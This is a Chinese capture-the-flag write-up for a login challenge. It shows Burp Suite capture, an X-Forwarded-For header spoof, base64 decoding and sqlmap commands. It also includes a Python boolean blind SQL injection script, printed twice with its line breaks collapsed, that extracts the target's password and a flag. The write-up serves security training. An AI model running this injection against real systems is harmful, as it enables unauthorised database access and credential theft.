题目环境:
题目难度:★★
题目描述:Q的系统会不会有漏洞?
看到了登录窗口,使用burp suite工具进行抓包
burp suite抓包
admin
1
Repeater重放
Send放包
Your IP is not the administrator’s IP address!
您的IP不是管理员的IP地址!
添加管理员IP
X-Forwarded-For:127.0.0.1
发现加密字符串
dXNlcjphZG1pbnxwYXNzOjE%3D
根据做题经验不难看出是base64编码
解密加密内容echo "dXNlcjphZG1pbnxwYXNzOjE%3D" | base64 -d
输入的账号和密码被加密
猜测此题目涉及SQL注入
使用sqlmap工具梭一把
使用sqlmap工具
将抓包数据内容复制下来放到一个文本文件当中
注意是加X-Forwarded-For请求头的那个数据包
这里我创建了一个名为flag.txt的文本文件
并将数据包内容粘贴到了其中
sqlmap -l 一把梭sqlmap -l flag.txt --batch --dbs
-l 从Burp或WebScarab代理日志中解析目标
--batch 可以理解为全自动化 自动选择yes
--dbs 列出所有的数据库
在root终端中运行此命令!
sqlmap -r /home/kali/桌面/flag.txt -D sql --dump
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
–dbs 列出所有的数据库
–batch 自动选择yes
–tables 列出当前的表
–columns 列出当前的列
–dump 获取字段中的数据
这里怀疑题改了
之前可以用sqlmap跑出来
现在跑不出来了
使用python盲注脚本进行爆破
#某大佬的脚本
'''# @Author: St1ck4r# @Date: 2022-11-16 09:12:20# @LastEditors: St1ck4r# @LastEditTime: 2022-11-17 10:36:03# @link: https://www.st1ck4r.top
'''import requests
import base64url = "{此处填写url地址}/check.php?data="
flag=""
data=""
header={"X-Forwarded-For":"127.0.0.1"}# payload = "(select group_concat(table_name) from information_schema.`TABLES` where table_schema = database())"
# payload = "(select group_concat(column_name) from information_schema.`COLUMNS` where table_name='user')"
payload = "(select group_concat(password) from user where username=\"flag\")"for i in range(100):low = 32high = 128mid = (low+high)//2while low < high:data = "user:admin' and ascii(substr({},{},1))<{} -- |pass:admin".format(payload,str(i+1),str(mid))data=base64.b64encode(data.encode()).decode()new_url = url + data# print(new_url) res = requests.get(new_url,headers=header)if("登陆成功!但是你登陆成功我也不会给你Flag" in res.text):high = midelse:low = mid + 1mid=(low+high)//2if mid <= 32 or mid >= 127:breakflag += chr(mid-1)
# print(flag)
print(flag)#某大佬的脚本
'''# @Author: St1ck4r# @Date: 2022-11-16 09:12:20# @LastEditors: St1ck4r# @LastEditTime: 2022-11-17 10:36:03# @link: https://www.st1ck4r.top
'''import requests
import base64url = "http://e460e3b7-ea11-46b9-a14a-6f68788be430.challenge.qsnctf.com:8081/check.php?data="
flag=""
data=""
header={"X-Forwarded-For":"127.0.0.1"}# payload = "(select group_concat(table_name) from information_schema.`TABLES` where table_schema = database())"
# payload = "(select group_concat(column_name) from information_schema.`COLUMNS` where table_name='user')"
payload = "(select group_concat(password) from user where username=\"flag\")"for i in range(100):low = 32high = 128mid = (low+high)//2while low < high:data = "user:admin' and ascii(substr({},{},1))<{} -- |pass:admin".format(payload,str(i+1),str(mid))data=base64.b64encode(data.encode()).decode()new_url = url + data# print(new_url)res = requests.get(new_url,headers=header)if("登陆成功!但是你登陆成功我也不会给你Flag" in res.text):high = midelse:low = mid + 1mid=(low+high)//2if mid <= 32 or mid >= 127:breakflag += chr(mid-1)
# print(flag)
print(flag)
得到flag:**qsnctf{b487c107-4130-466b-acd7-7c6484729eb4}**
![phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1](https://img-blog.csdnimg.cn/direct/2629dee7a9b5423186347e767a912d9d.png)
